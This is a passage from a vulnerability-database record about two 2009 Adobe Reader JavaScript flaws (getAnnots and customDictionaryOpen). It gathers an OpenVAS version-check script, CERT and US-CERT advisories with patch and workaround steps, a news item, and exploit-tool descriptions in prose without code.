get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"9.3.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"9.3.2\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-05T13:46:28", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to arbitrary\n code execution vulnerability.", "modified": "2018-12-04T00:00:00", "published": "2010-04-07T00:00:00", "id": "OPENVAS:1361412562310801303", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801303", "title": "Adobe Reader PDF Handling Code Execution Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_exe_code_exec_vuln_win.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe Reader PDF Handling Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801303\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-07 16:20:50 +0200 (Wed, 07 Apr 2010)\");\n script_cve_id(\"CVE-2009-1492\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Reader PDF Handling Code Execution Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006074.html\");\n script_xref(name:\"URL\", value:\"http://lists.immunitysec.com/pipermail/dailydave/2010-April/006072.html\");\n script_xref(name:\"URL\", value:\"https://forum.immunityinc.com/board/thread/1199/exploiting-pdf-files-without-vulnerabili/?page=1#post-1199\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Installed\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader version 8.x and 9.x on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to error in handling 'PDF' files, which allows to execute\n 'EXE' files that are embedded in a PDF document.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.3.2 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to arbitrary\n code execution vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code via\n a crafted document.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"9.3.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"9.3.2\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2019-02-15T12:33:43", "bulletinFamily": "info", "description": "### *Detect date*:\n06/09/2009\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Acrobat &amp; Reader. \n\n### *Affected products*:\nAdobe Acrobat &amp; Reader 9 versions 9.1 and earlier \nAdobe Acrobat &amp; Reader 8 versions 8.1.4 and earlier \nAdobe Acrobat &amp; Reader versions 7.1.1 and earlier\n\n### *Solution*:\nUpdate to latest version \n[Reader](<http://get.adobe.com/reader/>)\n\n### *Original advisories*:\n[Adobe bulletin](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Reader](<https://threats.kaspersky.com/en/product/Adobe-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2009-1493](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493>) \n[CVE-2009-1492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492>)", "modified": "2019-02-13T00:00:00", "published": "2009-06-09T00:00:00", "id": "KLA10033", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10033", "title": "\r KLA10033Multiple ACE vulnerabilities in Adobe Acrobat & Reader ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2018-12-25T20:18:22", "bulletinFamily": "info", "description": "### Overview \n\nAdobe Reader and Acrobat contain vulnerabilities in the `customDictionaryOpen()` and `getAnnots()` JavaScript methods.\n\n### Description \n\nAdobe Reader and the Adobe Acrobat family of software is designed to create, view, and edit Portable Document Format (PDF) files. Adobe Reader is widely deployed, and the Acrobat Reader Plug-In displays PDF inside a web browser.\n\nAdobe Reader and Acrobat support JavaScript. The JavaScript methods `customDictionaryOpen()` (CVE-2009-1493) and `getAnnots() `(CVE-2009-1492) do not safely handle specially crafted arguments and can be manipulated to execute arbitrary code. Publicly available exploit code claims to work on Adobe Reader 9.1 and 8.1.4 on GNU/Linux. Limited testing shows that Adobe Reader and Acrobat on and Microsoft Windows platforms crash when parsing a PDF file that contains a specially crafted `getAnnots() `call. As of 2009-04-29 we have not confirmed the reported `customDictionaryOpen()` vulnerability. \n \nAdobe Security Advisory [APSA09-02](<http://www.adobe.com/support/security/advisories/apsa09-02.html>) states that the `getAnnots()` vulnerability affects Adobe Reader and Acrobat for Microsoft Windows, Apple Mac OS X, and UNIX, while the `customDictionaryOpen()` vulnerability appears to only affect Adobe Reader for UNIX. \n \n--- \n \n### Impact \n\nBy convincing a user to open a specially crafted PDF file, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Update** \nFrom Adobe Security Bulletin [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>), update to version 9.1.1, 8.1.5, or 7.1.2 of Adobe Reader and Adobe Acrobat Standard, Pro and Pro Extended. \n \n--- \n \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript prevents these vulnerabilities from being exploited and reduces attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo disable JavaScript in Adobe Reader: \n\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `JavaScrip`t section.\n 5. Uncheck the `Enable Acrobat JavaScript` check box.\nDisabling JavaScript will not resolve the vulnerabilities, it will only disable the vulnerable JavaScript component. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n \nSome vendors ship JavaScript support in a [separate package](<http://packages.medibuntu.org/intrepid/acroread-escript.html>). Removing this package may remove JavaScript support. \n \n**Prevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CLASSES_ROOT\\AcroExch.Document.7]` \n`\"EditFlags\"=hex:00,00,00,00` \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo prevent PDF documents from automatically being opened in a web browser with Adobe Reader: \n\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `Internet` section.\n 5. Uncheck the `Display PDF in browser` check box.\n**Rename or remove Annots.api** \n \nTo disable the vulnerable `getAnnots() `method, rename or remove the `Annots.api` file. This will disable some Annotation functionality, however annotations can still be viewed. This does not protect against the `customDictionaryOpen() `vulnerability. \n \nOn Windows, Annots.api is typically located here: \n \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\plug_ins\"` \nExample location on GNU/Linux: \n \n`/opt/Adobe/Reader8/Reader/intellinux/plug_ins/Annots.api` \n**Do not access PDF documents from untrusted sources \n \n**Do not open unfamiliar or unexpected PDF documents, particularly those hosted on web sites or delivered as email attachments. Please see Cyber Security Tip [ST04-010](<http://www.us-cert.gov/cas/tips/ST04-010.html>). \n--- \n \n### Vendor Information\n\n970180\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Adobe \n\nNotified: April 28, 2009 Updated: May 13, 2009 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nPlease see Adobe Security Bulletin [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>) and Adobe Security Advisory [APSA09-02](<http://www.adobe.com/support/security/advisories/apsa09-02.html>). See also:\n\n \n<http://blogs.adobe.com/psirt/2009/04/potential_adobe_reader_issue.html> \n<http://blogs.adobe.com/psirt/2009/04/update_on_adobe_reader_issue.html> \n<http://blogs.adobe.com/psirt/2009/05/adobe_reader_issue_update.html>\n\n### Vendor References\n\nNone\n\n### Addendum\n\nThere are no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23970180 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.adobe.com/support/security/bulletins/apsb09-06.html>\n * <http://www.adobe.com/support/security/advisories/apsa09-02.html>\n * <http://blogs.adobe.com/psirt/2009/04/potential_adobe_reader_issue.html>\n * <http://blogs.adobe.com/psirt/2009/04/update_on_adobe_reader_issue.html>\n * <http://blogs.adobe.com/psirt/2009/05/adobe_reader_issue_update.html>\n * <http://www.adobe.com/devnet/acrobat/pdfs/js_api_reference.pdf>\n * <http://www.securityfocus.com/bid/34736/>\n * <http://www.securityfocus.com/bid/34740/>\n\n### Credit\n\nThese vulnerabilities were publicly reported by Arr1val. \n\nThis document was written by Art Manion. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2009-1492, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1492>) [CVE-2009-1493](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1493>) \n---|--- \n**Severity Metric:****** | 21.80 \n**Date Public:** | 2009-04-28 \n**Date First Published:** | 2009-04-29 \n**Date Last Updated: ** | 2009-09-05 02:06 UTC \n**Document Revision: ** | 44 \n", "modified": "2009-09-05T02:06:00", "published": "2009-04-29T00:00:00", "id": "VU:970180", "href": "https://www.kb.cert.org/vuls/id/970180", "type": "cert", "title": "Adobe Reader and Acrobat customDictionaryOpen() and getAnnots() JavaScript vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA09-133B\r\n\r\n\r\nAdobe Reader and Acrobat JavaScript Vulnerabilities\r\n\r\n Original release date: May 13, 2009\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Adobe Reader versions 9.1, 8.1.4, 7.1.1 and earlier\r\n\r\n * Adobe Acrobat Standard, Pro, and Pro Extended versions 9.1,\r\n 8.1.4, 7.1.1 and earlier\r\n\r\n\r\nOverview\r\n\r\n Adobe has released Security Bulletin APSB09-06, which describes\r\n Adobe Reader and Acrobat updates for two JavaScript vulnerabilities\r\n that could allow a remote attacker to execute arbitrary code.\r\n\r\n\r\nI. Description\r\n\r\n Adobe Security Bulletin APSB09-06 announces updates for two\r\n JavaScript vulnerabilities that affect Adobe Reader and Acrobat.\r\n \r\n * A vulnerability in the getAnnots&#40;&#41; method &#40;CVE-2009-1492&#41;\r\n affects Adobe Reader and Acrobat for Microsoft Windows, Apple\r\n Mac OS X, and UNIX.\r\n\r\n * A vulnerability in the customDictionaryOpen&#40;&#41; method\r\n &#40;CVE-2009-1493&#41; appears to only affect Adobe Reader for UNIX.\r\n\r\n Further details are available in Vulnerability Note VU#970180.\r\n\r\n An attacker could exploit these vulnerabilities by convincing a\r\n user to open a specially crafted Adobe Portable Document Format\r\n &#40;PDF&#41; file. Acrobat integrates with popular web browsers, and\r\n visiting a website is usually sufficient to cause Reader or Acrobat\r\n to open a PDF file.\r\n\r\n\r\nII. Impact\r\n\r\n By convincing a victim to open a specially crafted PDF file, a\r\n remote, unauthenticated attacker may be able to execute arbitrary\r\n code.\r\n\r\n\r\nIII. Solution\r\n\r\n Update\r\n \r\n Adobe has released updates to address this issue. Users are\r\n encouraged to read Adobe Security Bulletin APSB09-06 and update\r\n vulnerable versions of Adobe Reader and Acrobat. According to\r\n APSB09-06, these vulnerabilities are addressed in versions 9.1.1,\r\n 8.1.5, and 7.1.2 of Adobe Reader and Acrobat.\r\n\r\n Disable JavaScript in Adobe Reader and Acrobat\r\n\r\n Disabling JavaScript prevents these vulnerabilities from being\r\n exploited and reduces attack surface. If this workaround is\r\n applied to updated versions of the Adobe Reader and Acrobat, it\r\n may protect against future vulnerabilities.\r\n \r\n To disable JavaScript in Adobe Reader:\r\n \r\n 1. Open Adobe Acrobat Reader.\r\n 2. Open the Edit menu.\r\n 3. Choose the Preferences... option.\r\n 4. Choose the JavaScript section.\r\n 5. Uncheck the Enable Acrobat JavaScript check box.\r\n\r\n Disabling JavaScript will not resolve the vulnerabilities, it\r\n will only disable the vulnerable JavaScript component. When\r\n JavaScript is disabled, Adobe Reader and Acrobat prompt to\r\n re-enable JavaScript when opening a PDF that contains JavaScript.\r\n \r\n Prevent Internet Explorer from automatically opening PDF documents\r\n\r\n The installer for Adobe Reader and Acrobat configures Internet\r\n Explorer to automatically open PDF files without any user\r\n interaction. This behavior can be reverted to the safer option of\r\n prompting the user by importing the following as a .REG file:\r\n \r\n Windows Registry Editor Version 5.00\r\n [HKEY_CLASSES_ROOT&#92;AcroExch.Document.7]&quot;EditFlags&quot;=hex:00,00,00,00\r\n \r\n Disable the display of PDF documents in the web browser\r\n\r\n Preventing PDF documents from opening inside a web browser\r\n reduces attack surface. If this workaround is applied to updated\r\n versions of the Adobe Reader and Acrobat, it may protect against\r\n future vulnerabilities. To prevent PDF documents from\r\n automatically being opened in a web browser with Adobe Reader:\r\n \r\n 1. Open Adobe Acrobat Reader.\r\n 2. Open the Edit menu.\r\n 3. Choose the preferences option.\r\n 4. Choose the Internet section.\r\n 5. Un-check the &quot;Display PDF in browser&quot; check box.\r\n \r\n Rename or remove Annots.api\r\n\r\n To disable the vulnerable getAnnots&#40;&#41; method, rename or remove\r\n the Annots.api file. This will disable some Annotation\r\n functionality, however annotations can still be viewed. This does\r\n not protect against the customDictionaryOpen&#40;&#41; vulnerability. On\r\n Windows, Annots.api is typically located here:\r\n \r\n &quot;&#37;ProgramFiles&#37;&#92;Adobe&#92;Reader 9.0&#92;Reader&#92;plug_ins&quot;\r\n \r\n Example location on GNU/Linux:\r\n \r\n /opt/Adobe/Reader8/Reader/intellinux/plug_ins/Annots.api\r\n \r\n Do not access PDF documents from untrusted sources\r\n\r\n Do not open unfamiliar or unexpected PDF documents, particularly\r\n those hosted on web sites or delivered as email\r\n attachments. Please see Cyber Security Tip ST04-010.\r\n\r\n\r\nIV. References\r\n\r\n * Vulnerability Note VU#970180 -\r\n &lt;http://www.kb.cert.org/vuls/id/970180&gt;\r\n\r\n * Cyber Security Tip ST04-010: Using Caution with Email Attachments -\r\n &lt;http://www.us-cert.gov/cas/tips/ST04-010.html&gt;\r\n\r\n * Adobe Security Bulletin APSB09-06 -\r\n &lt;http://www.adobe.com/support/security/bulletins/apsb09-06.html&gt;\r\n\r\n * CVE-2009-1492 -\r\n &lt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492&gt;\r\n\r\n * CVE-2009-1493 -\r\n &lt;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493&gt;\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n &lt;http://www.us-cert.gov/cas/techalerts/TA09-133B.html&gt;\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to &lt;cert@cert.org&gt; with &quot;TA09-133B Feedback VU#970180&quot; in\r\n the subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit &lt;http://www.us-cert.gov/cas/signup.html&gt;.\r\n ____________________________________________________________________\r\n\r\n Produced 2009 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n &lt;http://www.us-cert.gov/legal.html&gt;\r\n ____________________________________________________________________\r\n\r\nRevision History\r\n \r\n May 13, 2009: Initial release\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.5 &#40;GNU/Linux&#41;\r\n\r\niQEVAwUBSgsuwnIHljM+H4irAQLRAQf+OjeDGX/M6wdh8SkqOru0HB3KsqmzZjOq\r\nBvwX7B3Z/my9FVUmxIz1nQH4MjZqSlxIZdmAVU2YW+jv1oFgyT9ltminL4v6RGM1\r\noEaQHIEiu+N+dXwWqvtsOrszEN/Q9GMOckxUGkDNran/9OvplZJfh6pFjCxP02Im\r\n2Y07Z0eIBqx5ULoIXHzfvGBe/7k5djxr2F2KaEZFwL3vSmw3Xlz9+/OD2iJC/yT6\r\nsxuiKXX8OCRRiLe0B5pInFgS9o01L8y5AMqfET6QqyIqkFq2KnwV5eKhWqLNAljq\r\nEFOKJHN8IQPTwJi+qbd9uHlRrqf6ekOkfkql49ZXvSbUSdYcnlfMPQ==\r\n=uewj\r\n-----END PGP SIGNATURE-----", "modified": "2009-05-14T00:00:00", "published": "2009-05-14T00:00:00", "id": "SECURITYVULNS:DOC:21826", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21826", "title": "US-CERT Technical Cyber Security Alert TA09-133B -- Adobe Reader and Acrobat JavaScript Vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:10:05", "bulletinFamily": "info", "description": "[](<https://threatpost.com/adobe-joins-patch-tuesday-barrage-051309/>)Adobe joined the Patch Tuesday barrage late yesterday, dropping fixes for a pair of code execution holes affecting its Adobe Reader and Acrobat products.[ \n](<http://blogs.zdnet.com/security/?p=3229> \"Permanent Link to Exploit posted for brand-new Adobe PDF zero-day\" )\n\nThe [critical update](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>) [adobe.com] addresses a publicly known vulnerability that was being exploited with booby-trapped PDF files.\n\n**[ SEE: **[**Inside the PowerPoint mega-patch**](<https://threatpost.com/adobe-joins-patch-tuesday-barrage-051309/>)** ]**\n\nFrom Adobe\u2019s bulletin:\n\nA critical vulnerability has been identified in Adobe Reader 9.1 and Acrobat 9.1 and earlier versions. This vulnerability (CVE-2009-1492) would cause the application to crash and could potentially allow an attacker to take control of the affected system. A second vulnerability has also been reported that appears to affect Adobe Reader for UNIX only (CVE-2009-1493). These issues are remotely exploitable.\n\nAdobe recommends users of Acrobat and Adobe Reader update their product installations to versions 9.1.1, 8.1.5, or 7.1.2 using the instructions above to protect themselves from potential vulnerabilities.\n\n**[ SEE: **[**Apple Patch Day: 67 Mac OS X, Safari vulnerabilities**](<https://threatpost.com/adobe-joins-patch-tuesday-barrage-051309/>)** ]**\n\nMac users will have to wait a while longer for this fix:\n\nAdobe expects to make available Adobe Reader 7 and Acrobat 7 updates for Macintosh before the end of June.\n\nYesterday was quite a banner day for security patches. First, Microsoft dropped a major PowerPoint update to correct 14 documented security flaws and, later in the day, Adobe shipped fixes for a whopping 67 vulnerabilities affecting Mac OS X and Safari.\n\n_* Image [from midiman](<http://www.flickr.com/photos/midiman/>) (CC 2.0) _\n", "modified": "2013-04-17T16:39:13", "published": "2009-05-13T14:36:11", "id": "THREATPOST:FD3B3E8871059FA1B40FE0E09CEBA411", "href": "https://threatpost.com/adobe-joins-patch-tuesday-barrage-051309/72682/", "type": "threatpost", "title": "Adobe joins Patch Tuesday barrage", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "description": "Added: 05/29/2009 \nCVE: [CVE-2009-1492](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492>) \nBID: [34736](<http://www.securityfocus.com/bid/34736>) \nOSVDB: [54130](<http://www.osvdb.org/54130>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA vulnerability in the Javascript API allows command execution when a user opens a PDF file which calls the `**getAnnots**` method with specially crafted arguments. \n\n### Resolution\n\nApply one of the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 and requires a user to open the exploit file in Adobe Reader. \n\nDue to the nature of the vulnerability, the success of the exploit depends on the state of the target system's memory. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-29T00:00:00", "published": "2009-05-29T00:00:00", "id": "SAINT:CEDD49A8B4DB5911F7462ADDC84F7F1C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_getannots", "type": "saint", "title": "Adobe Reader Javascript API getAnnots method vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 05/29/2009 \nCVE: [CVE-2009-1492](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492>) \nBID: [34736](<http://www.securityfocus.com/bid/34736>) \nOSVDB: [54130](<http://www.osvdb.org/54130>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA vulnerability in the Javascript API allows command execution when a user opens a PDF file which calls the `**getAnnots**` method with specially crafted arguments. \n\n### Resolution\n\nApply one of the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 and requires a user to open the exploit file in Adobe Reader. \n\nDue to the nature of the vulnerability, the success of the exploit depends on the state of the target system's memory. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-29T00:00:00", "published": "2009-05-29T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_getannots", "id": "SAINT:FBEE88D561880A37F17CB8475A74DF84", "title": "Adobe Reader Javascript API getAnnots method vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:16", "bulletinFamily": "exploit", "description": "Added: 05/29/2009 \nCVE: [CVE-2009-1492](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492>) \nBID: [34736](<http://www.securityfocus.com/bid/34736>) \nOSVDB: [54130](<http://www.osvdb.org/54130>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA vulnerability in the Javascript API allows command execution when a user opens a PDF file which calls the `**getAnnots**` method with specially crafted arguments. \n\n### Resolution\n\nApply one of the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 and requires a user to open the exploit file in Adobe Reader. \n\nDue to the nature of the vulnerability, the success of the exploit depends on the state of the target system's memory. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-29T00:00:00", "published": "2009-05-29T00:00:00", "id": "SAINT:FA0AC5B49967884BC44994F190A2AB12", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_getannots", "title": "Adobe Reader Javascript API getAnnots method vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:02:01", "bulletinFamily": "exploit", "description": "Added: 05/12/2009 \nCVE: [CVE-2009-1493](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493>) \nBID: [34740](<http://www.securityfocus.com/bid/34740>) \nOSVDB: [54129](<http://www.osvdb.org/54129>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in the Javascript API in Adobe Reader allows command execution when a user opens a specially crafted PDF file which calls the `**spell.customDictionaryOpen**` method. \n\n### Resolution\n\nApply the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 on Ubuntu 8.04.1 and Red Hat Enterprise Linux 5 with Exec-Shield enabled. Note that binary files AdbeRdr9.1.0-1_i486linux_enu.bin and AdobeReader_enu-8.1.3-1.i486.tar.gz from the official site of the vendor were used to develop this exploit. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-12T00:00:00", "published": "2009-05-12T00:00:00", "id": "SAINT:AA296E365F7326125870EB3DED9B1E5C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_customdictionaryopen", "type": "saint", "title": "Adobe Reader Javascript API spell.customDictonaryOpen memory corruption", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-14T16:58:05", "bulletinFamily": "exploit", "description": "Added: 05/12/2009 \nCVE: [CVE-2009-1493](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493>) \nBID: [34740](<http://www.securityfocus.com/bid/34740>) \nOSVDB: [54129](<http://www.osvdb.org/54129>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in the Javascript API in Adobe Reader allows command execution when a user opens a specially crafted PDF file which calls the `**spell.customDictionaryOpen**` method. \n\n### Resolution\n\nApply the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 on Ubuntu 8.04.1 and Red Hat Enterprise Linux 5 with Exec-Shield enabled. Note that binary files AdbeRdr9.1.0-1_i486linux_enu.bin and AdobeReader_enu-8.1.3-1.i486.tar.gz from the official site of the vendor were used to develop this exploit. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-12T00:00:00", "published": "2009-05-12T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_customdictionaryopen", "id": "SAINT:ED952066EAE6F9D664D81C70DB51E326", "type": "saint", "title": "Adobe Reader Javascript API spell.customDictonaryOpen memory corruption", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:12", "bulletinFamily": "exploit", "description": "Added: 05/12/2009 \nCVE: 